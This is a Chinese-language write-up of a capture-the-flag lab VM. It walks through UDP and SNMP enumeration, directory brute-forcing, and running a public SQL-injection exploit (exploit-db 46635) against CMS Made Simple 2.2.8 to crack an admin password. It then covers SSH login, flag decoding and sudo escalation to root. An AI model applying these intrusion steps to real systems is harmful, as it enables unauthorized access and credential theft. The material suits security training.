目录
信息搜集
扫描网段确定真实IP地址
扫描IP地址确定开放端口以及服务
浏览器查看web网站
好像就是一个普普通通的网站,甚至都没有什么功能点,有个搜索键还是假的。所以再web方面并没有发现什么有用的信息
扫描网站目录
dirsearch -u http://192.168.179.164
几乎等同于没有收获,我一开始还去访问了/images/目录发现12345689都有就是没有7,我还以为隐藏起来了,结果并没有就是不存在,还尝试过去找图片内的信息(隐写相关)都以失败告终。
使用dirb扫
dirb http://192.168.179.164
结果几乎是一样的
扫描udp服务
看样子http这边是行不通了,当时在我看来就只剩ssh服务了,ssh在中间件没有问题的情况下只能是暴力破解,于是从网站页面爬了个字典,用户名和密码一起跑。欸 也没跑出来。麻了 兄弟们。
开启偷瞄,发现是udp的服务,唉 ,也不难就是一个思路问题,我咋就没想到呢,之前也不是没碰见过,长记性下次再没思路记得一定试试udp
nmap -sU 192.168.179.164
发现漏洞
获取第一个flag
使用msf工具搜索snmp利用模块
msfconsole
search snmp
use auxiliary/scanner/snmp/snmp_enum
show options
set rhost 192.168.179.164
run
####
获取到第一个flag:
Way to Root:1 (0e462097431)
Rig Veda: {0e87105d070afcb11c7264cc13f2e86b}
该模块的作用是获取到community,如果有可读权限,可以使用这个模块读取系统信息
获取第二个flag
爬取网站信息作为扫描网站目录的字典扫描该网站目录
cewl http://192.168.179.164/ > /tmp/user.txt
cd /tmp
dirb http://192.168.179.164 user.txt
访问扫描出的网站目录
看这个网站主页也很明白了,就跟cms相关的呗,simple但是没有具体的版本号,还是要搞到版本号才好有针对性的下手
Whatweb
whatweb是一款开源的网站指纹识别软件,同时也是集成在kali上了所以用起来也很方便,Whatweb可识别的web技术,包括内容管理系统(CMS),博客平台,统计/分析包,Javascript库,服务器和嵌入式设备。使用教程
whatweb http://192.168.179.164/Kashyapa/
searchsploit
searchsploit CMS Made Simple 2.2.8
使用漏洞利用脚本得到第二个flag
locate php/webapps/46635.py
scp /usr/share/exploitdb/exploits/php/webapps/46635.py /tmp
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt
提示报错缺少termcolor模块,去官网下载并解压导入
tar -zxvf termcolor-1.1.0.tar.gz
cd termcolor-1.1.0
python setup.py install
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt
#####
[+] Salt for password found: 65bd8602d290b16d
[+] Username found: atri
[+] Email found: abcd@gmail.com
[+] Password found: 49ba135760e8265758ae48ef5c7338c7
[+] Password cracked: anasuya
扫描二级目录
dirsearch -u http://192.168.179.164/Kashyapa/
还是有很多信息的,我们这边就不一一查看了。因为的得到了一个用户名和密码所以我们这边直接找登录页面
http://192.168.179.164/Kashyapa/admin/login.php
使用我们之前得到的用户名和密码进行登录
用户名:atri
密码:anasuya
####
登录后在后台找到flag
Yagur Veda: {81b44a402a34a850dfcf1e277a18234d}
Way to Root:2 (906509019)
获取第三个flag
登录ssh
除了网站后台还有一个可用于登录的地方,那就是ssh(我可一直记着你呢)
ssh atri@192.168.179.164
anasuya
查看各种文件最终找到第三个flag
cd /opt/
ls -al
cd test/
ls -al
cat index.html
######
Sama Veda: {c9a9aeb104157fb92f781714d010099c}
Way to Root:3 (562988736854)
提权
我们在翻看各种文件的时候发现家目录下还有一个用户
一般来说按照出题人的套路一般都是一个用户下一个flag,所以我们应该要想办法切换到vedas用户中去
将之前的到的3个flag中的way to root组合起来
得到
得到:0e462097431906509019562988736854
md5解密:240610708
将该结果作为vedas的密码登录
su vedas
240610708
该用户家目录下并没有flag,尝试进入root目录
失败
尝试提权到root
sudo -l
sudo su
cd /root
cat final.txt
总结
这个靶机总的来说难度不是很高,对我来说就是有些思路想不到,这种靶机应该就更类似CTF一样,所以还是要多做题培养自己的解题思路。比如说一开始扫描udp服务,你说这种知识点难嘛,也不难,但是我就是没想到,还有一个就是最后把3个flag组合起来然后解密是我没想到的。相比之下我更喜欢前面的那两个靶机,总感觉出题的痕迹特别明显然后有些题解着特别牵强。
参考文章
https://www.cnblogs.com/gaonuoqi/p/14958209.html
https://www.hackingarticles.in/ha-vedas-vulnhub-walkthrough/